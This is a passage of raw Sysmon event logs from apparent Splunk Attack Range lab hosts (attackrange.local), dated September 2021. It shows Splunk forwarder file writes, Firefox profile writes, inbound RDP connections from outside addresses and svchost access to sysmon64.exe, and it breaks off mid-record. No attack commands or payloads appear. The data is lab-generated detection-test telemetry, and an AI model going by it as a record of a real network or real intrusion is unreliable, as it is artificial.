Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:30.841{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A86EF57594405D598933F4212F8BB9FA,SHA256=2DA2E887206178CCEADAA1681CFA6B98B5D0A5DF553B1558FAC9AE59E563800A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:30.641{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCCA0629697D24F375CF4E85F31CFCD8,SHA256=410BEF45262F58751F19ADD6E8920B8747DA31055D2092E3C2DEDBCC195C4726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:31.863{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47854E3F6FAFF150CE0D4C36F2975581,SHA256=70A3B12352338E1CCBF9E09604C4178EBC47FEDBF4E8F1D139F8E8B62C842A38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:31.847{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A143978826362A18221C183ECF0DD50D,SHA256=A85AB54D51CB57409027B804B37B5AABF8912A457397DDDFCFDEEA356FEC5EBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:32.880{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C573F2E4F1789F2C4EE67BF44CABCCB,SHA256=BE322F3D5ED6E01D34103C497595D7443C685415597249AED16FEFCC8D6A9F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:32.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC110062EDCAC4C4A2F060AEC20052A,SHA256=A262E01FD8B0029B75B2D213512550E5EF2BEC4A3010901CA2ED4A96C9A05F25,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:30.496{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59941-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:32.137{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3488E72726F7E433DC1C5062674F0BD,SHA256=D930B63C386A5FFAA28A0B2826CE17405030D6F6A2B4B8E3703E44A405C41C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:32.135{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBDC216E14F4441E400DB83A04299F21,SHA256=63DE3C068784CD73040068A25537D9BF9EC6847A40D36DDBD99355FEA9BC7F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:32.563{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2AEB24E5003163931AADA18B7122878C,SHA256=F39B4AD486B4126D439DF3C7A55908FCBBF829AD0AB81DC8F1B1E1C0A321478A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.181{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61817-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.688{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59440-false10.0.1.12-8000- 23542300x8000000000000000979812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:32.282{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1207EA85E3652CA9C7AE5829619EFFAC,SHA256=F0035D39725C728F8DBDEBDD9ADFD5C348FAFB8E80D6C6259CD12DF9BABB0500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:33.922{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DE5179D37C5D662C784CD66B820CA2C,SHA256=DFF339FC952A855DED933557DFE123DD5F0518CCA9898C0BDE092D9C031C0761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:33.991{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177B86661A83DEE44ABAFBE3104B63AD,SHA256=4573FAA48ABD1D998D02C132970E0C151403BEA2B5A10F1350A3AE882EFBEE69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:34.954{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC788D40B41E47B4E133984A83D406C1,SHA256=DFE6E235FEDFDD6147BC90D8628CC3536A2449269E55841F1BA3AE59925EC837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:34.954{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19B88C605A791C79FB4F1F6F96455C03,SHA256=9D88DFE604554A5BB952BF41A4467DA7461E911C52B8F855B8DE5050C7284FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.791{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=EC9372496C7273AEAFE5D183F873A079,SHA256=EF8FB1CA373A12040E964277C593BD9F9D38D31B4D5B1123541BB0387D4AF9B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.790{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=FAA49B51E9BEF89EE8006850A098A4F2,SHA256=5212CD17C476904C11ABBCB064BF0CCA174E197B2D862B23F6E003CE5441E6EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.788{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=54E6D83F56D309C2EC16A2578546ED52,SHA256=C4D4C15DA70C934FCDB06DF1EBE0819A908228A43D32C0FA2C20396AED9040DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.786{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=1621421CAF40512A6FB881350B3D326B,SHA256=4E2395B9E93AB4B11B114F14FAE08766D02A79E59B278D5B01AD7863322CFA42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.785{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=C743D892CD4EDFB33BDB3F7E7E06DF61,SHA256=B03E238BE07DDBE49470F2EBE7256E363086E91F7D68C76DA44CA197627BDEDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.783{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=EABAB7ACCB962168D7A0837988D1CE96,SHA256=D08240778ECD3F894F1DDC21F63CE9E34671D1B4A7ADF7AE5D081907806C240B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:32.771{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53436-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:35.969{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A56B898BC300E43E9D670B2AA28783,SHA256=F8C1D2CFC0B46D8B6105D9105711FC26871C47F3801C493F0FAFB5932AAABBB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:34.998{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC6A0BA639CDCFE74A22AC15420DAEC6,SHA256=C355336AD0CFF9DA15576416E097056EB9EC1B559985A0BD26051D6A86682AF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:32.717{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-63288-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:31.978{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63655-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001051159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:36.750{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:36.045{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C04BF1D0D1CCE3B18690FCAA9ED78F67,SHA256=818FCE818BB89D643AE310BF987E32E346CDE4A230052FD5727AA38F19DB6C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:36.751{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F54203B9C9FDB04D6182EEEEF45271AD,SHA256=2D101E1547CF1635790E65B762142F447BA3CBBD26CB92224306DE79B8B764D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:33.845{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59441-false10.0.1.12-8000- 23542300x80000000000000001051160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:37.105{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D895713BCD31A1A9A5791518B74FE6BD,SHA256=444AFEC9921601DC688C397404A4E80ABDB9E298DBDC1F8953865801B907C864,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BF5-6151-E979-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:37.454{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 